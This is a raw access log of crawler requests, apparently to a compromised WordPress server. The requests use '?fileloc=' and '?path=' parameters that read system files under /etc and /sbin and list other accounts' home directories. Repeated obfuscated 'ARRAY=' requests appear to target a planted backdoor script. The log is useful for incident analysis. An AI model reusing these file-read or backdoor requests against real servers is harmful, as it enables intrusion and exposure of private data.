216.73.217.176 - - [19/May/2026:15:43:44 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fassets%2Fscript-loader-packages.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fassets HTTP/2" 200 4897 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:43:47 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2F.spamassassin HTTP/2" 200 2915 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:41:48 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353330382p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313730382q6365333938613566636661386466636664386166393537356431373061396565222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:43:50 +0100] "GET /?fileloc=%2F%2Fsbin%2Frtcwake&path=%2F%2Fsbin HTTP/2" 200 13065 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.174 - - [19/May/2026:15:43:52 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/031641958031 HTTP/1.1" 200 27547 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:43:53 +0100] "GET /?fileloc=%2F%2Fsbin%2Flgroupadd&path=%2F%2Fsbin HTTP/2" 200 6659 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:43:56 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Ftablepress%2Findex.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Ftablepress HTTP/2" 200 2648 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:02 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fblock-template-utils.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 16096 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:04 +0100] "GET /?path=%2F%2Fhome2%2Fculturedeptncgov HTTP/2" 200 2632 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:07 +0100] "GET /?fileloc=%2F%2Fetc%2Fdomain_remote_mx_ips.cdb&path=%2F%2Fetc HTTP/2" 200 2579 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:10 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin%2Fsetup-config.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin HTTP/2" 200 8506 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:42:10 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353333302p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313733302q3732333232346237383866396430613165663564316633373539303564666635222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:44:13 +0100] "GET /?fileloc=%2F%2Fetc%2Feximmailtrap&path=%2F%2Fetc HTTP/2" 200 2569 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:16 +0100] "GET /?fileloc=%2F%2Fetc%2Fadjtime&path=%2F%2Fetc HTTP/2" 200 2580 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.96 - - [19/May/2026:15:44:16 +0100] "GET /collect/112117092112 HTTP/1.1" 200 27048 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:44:19 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-wp-block-patterns-registry.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 5202 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:22 +0100] "GET /?fileloc=%2F%2Fsbin%2Frotatelogs&path=%2F%2Fsbin HTTP/2" 200 11448 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:25 +0100] "GET /?path=%2F%2Fhome%2Fpvengineering HTTP/2" 200 2633 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:28 +0100] "GET /?fileloc=%2F%2Fsbin%2Fpartx&path=%2F%2Fsbin HTTP/2" 200 25548 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:31 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FID3%2Fmodule.audio.dts.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FID3 HTTP/2" 200 5540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:42:32 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353335322p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313735322q3439333964356665336261386462363631333961316663323238623439373630222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:44:34 +0100] "GET /?path=%2F%2Fhome2%2Fgovernorncgov HTTP/2" 200 2633 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:37 +0100] "GET /?fileloc=%2F%2Fsbin%2Fnamed-checkzone&path=%2F%2Fsbin HTTP/2" 200 13415 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:15:44:39 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/073728233149 HTTP/1.1" 200 27398 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:44:41 +0100] "GET /?path=%2F%2Fhome%2Fwwwbrevo HTTP/2" 200 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:43 +0100] "GET /?fileloc=%2F%2Fsbin%2Fmkfs.vfat&path=%2F%2Fsbin HTTP/2" 200 22381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:46 +0100] "GET /?fileloc=%2F%2Fsbin%2Fupdate-smart-drivedb&path=%2F%2Fsbin HTTP/2" 200 15738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:49 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdovecot_cpshutdown&path=%2F%2Fsbin HTTP/2" 200 3883 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:52 +0100] "GET /?fileloc=%2F%2Fsbin%2Fmkfs.cramfs&path=%2F%2Fsbin HTTP/2" 200 13813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:44:55 +0100] "GET /?fileloc=%2F%2Fetc%2Fld.so.conf&path=%2F%2Fetc HTTP/2" 200 2581 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:42:55 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353337352p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313737352q3138656163306130373932363236336466666539353264636363353632326335222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:44:58 +0100] "GET /?fileloc=%2F%2Fetc%2Fstats.conf&path=%2F%2Fetc HTTP/2" 200 2608 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:03 +0100] "GET /?fileloc=%2F%2Fsbin%2Frdma&path=%2F%2Fsbin HTTP/2" 200 39470 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:05 +0100] "GET /?fileloc=%2F%2Fetc%2F.pwd.lock&path=%2F%2Fetc HTTP/2" 200 2567 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.97 - - [19/May/2026:15:45:05 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/031584164196 HTTP/1.1" 200 27274 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:45:08 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fwp-rocket%2Fcomposer.json&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fwp-rocket HTTP/2" 200 5212 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:11 +0100] "GET /?fileloc=%2F%2Fetc%2Fwwwacct.conf.cache&path=%2F%2Fetc HTTP/2" 200 2794 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:14 +0100] "GET /?fileloc=%2F%2Fsbin%2Faureport&path=%2F%2Fsbin HTTP/2" 200 45318 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:17 +0100] "GET /?fileloc=%2F%2Fsbin%2Fiptables-nft-restore&path=%2F%2Fsbin HTTP/2" 200 88673 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:43:18 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353339382p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313739382q3431326661613163373831623935333562303034306364633261383138333662222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:45:20 +0100] "GET /?fileloc=%2F%2Fsbin%2Fwhmlogin&path=%2F%2Fsbin HTTP/2" 200 3593 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:23 +0100] "GET /?fileloc=%2F%2Fsbin%2Fdnssec-revoke&path=%2F%2Fsbin HTTP/2" 200 12196 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:26 +0100] "GET /?fileloc=%2F%2Fsbin%2Flosetup&path=%2F%2Fsbin HTTP/2" 200 28945 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:29 +0100] "GET /?fileloc=%2F%2Fsbin%2Fmkfs.xfs&path=%2F%2Fsbin HTTP/2" 200 191789 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:32 +0100] "GET /?fileloc=%2F%2Fsbin%2Fxfs_logprint&path=%2F%2Fsbin HTTP/2" 200 37397 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:35 +0100] "GET /?path=%2F%2Fhome%2Fvgodeliveries HTTP/2" 200 2633 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:38 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fupdraftplus%2Freadme.txt&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fupdraftplus HTTP/2" 200 52049 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:43:40 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353432302p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313832302q6563663337306562366139383135663037646566303933626336373461636462222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:45:41 +0100] "GET /?path=%2F%2Fhome%2Fculturedeptncgov HTTP/2" 200 2631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:44 +0100] "GET /?fileloc=%2F%2Fetc%2Foutgoing_mail_hold_users&path=%2F%2Fetc HTTP/2" 200 2578 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:47 +0100] "GET /?path=%2F%2Fhome%2Fgovernorncgov HTTP/2" 200 2631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:50 +0100] "GET /?fileloc=%2F%2Fsbin%2Fsemanage&path=%2F%2Fsbin HTTP/2" 200 11091 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:53 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FID3%2Fmodule.audio.ogg.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FID3 HTTP/2" 200 11156 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:45:56 +0100] "GET /?fileloc=%2F%2Fsbin%2Ftsig-keygen&path=%2F%2Fsbin HTTP/2" 200 9605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:44:02 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353434322p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313834322q3564323637353033663835366438646438643430316436313637616264393737222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:46:02 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fcron.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 10730 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:04 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FID3%2Fmodule.audio-video.flv.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FID3 HTTP/2" 200 8719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:07 +0100] "GET /?fileloc=%2F%2Fetc%2Feximrejects&path=%2F%2Fetc HTTP/2" 200 2670 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:10 +0100] "GET /?fileloc=%2F%2Fsbin%2Fsestatus&path=%2F%2Fsbin HTTP/2" 200 8310 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:13 +0100] "GET /?fileloc=%2F%2Fetc%2Fips.remotedns&path=%2F%2Fetc HTTP/2" 200 2615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:16 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-phpmailer.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:19 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2Fwww HTTP/2" 200 4071 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:22 +0100] "GET /?path=%2Fhome%2Fhuhuasi1 HTTP/2" 200 2628 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:44:24 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353436342p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313836342q3966643833646232393533313766393665363736633235653361633465306134222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:46:25 +0100] "GET /?fileloc=%2F%2Fetc%2Fuserdomains&path=%2F%2Fetc HTTP/2" 200 2567 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:28 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fclass-smtp.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:31 +0100] "GET /?fileloc=%2F%2Fetc%2Frequest-key.conf&path=%2F%2Fetc HTTP/2" 200 3235 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:34 +0100] "GET /?fileloc=%2F%2Fswap.img&path=%2F HTTP/2" 200 2555 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:37 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin%2Foptions-general.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-admin HTTP/2" 200 9339 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.160 - - [19/May/2026:15:46:38 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/03906770321 HTTP/1.1" 200 27306 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:46:40 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fms-deprecated.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes HTTP/2" 200 8963 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:43 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fwp-rocket%2Fcomposer.lock&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fwp-rocket HTTP/2" 200 35749 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:44:46 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353438362p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313838362q6534346137386339373431623337356439626164306134616262373639656366222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:46:47 +0100] "GET /?fileloc=%2F%2Fsbin%2Fiptables-restore-translate&path=%2F%2Fsbin HTTP/2" 200 88675 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:50 +0100] "GET /?fileloc=%2F%2Fetc%2Fexim.conf.dist&path=%2F%2Fetc HTTP/2" 200 9723 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:53 +0100] "GET /?fileloc=%2F%2Fsbin%2Fxfs_info&path=%2F%2Fsbin HTTP/2" 200 3290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:56 +0100] "GET /?fileloc=%2F%2Fsbin%2Fquotaoff&path=%2F%2Fsbin HTTP/2" 200 24454 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:46:59 +0100] "GET /?fileloc=%2F%2Fsbin%2Fsaslpasswd2&path=%2F%2Fsbin HTTP/2" 200 7793 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:02 +0100] "GET /?fileloc=%2F%2Fsbin%2Fselabel_lookup&path=%2F%2Fsbin HTTP/2" 200 6803 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:05 +0100] "GET /?fileloc=%2F%2Fetc%2Fmanualmx&path=%2F%2Fetc HTTP/2" 200 2566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:08 +0100] "GET /?fileloc=%2F%2Fetc%2Fcsh.login&path=%2F%2Fetc HTTP/2" 200 2990 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
